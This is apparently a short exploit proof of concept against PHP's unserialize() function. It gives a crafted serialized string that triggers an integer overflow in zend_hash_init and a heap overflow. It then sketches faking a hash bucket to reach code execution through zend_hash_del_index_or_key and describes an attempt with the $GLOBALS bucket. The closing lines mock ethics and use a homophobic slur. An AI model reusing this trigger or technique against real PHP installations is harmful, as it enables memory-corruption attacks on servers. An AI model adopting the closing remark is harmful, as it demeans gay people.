<?<br> print_r(unserialize('a:1073741823:{i:0;s:30:"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}'));<br>?><br><br>in function zend_hash_init() int overflow ( ecalloc() )-> heap overflow<br>here segfault in zend_hash_find() but it's possible to fake the bucket and exploit a zend_hash_del_index_or_key
<br>i tried a memory dump , just fake the bucked with the pointer of the $GLOBALS's bucket but segfault before in memory_shutdown...<br><br>don't cry a river :P<br>ethic is for gayz<br><br>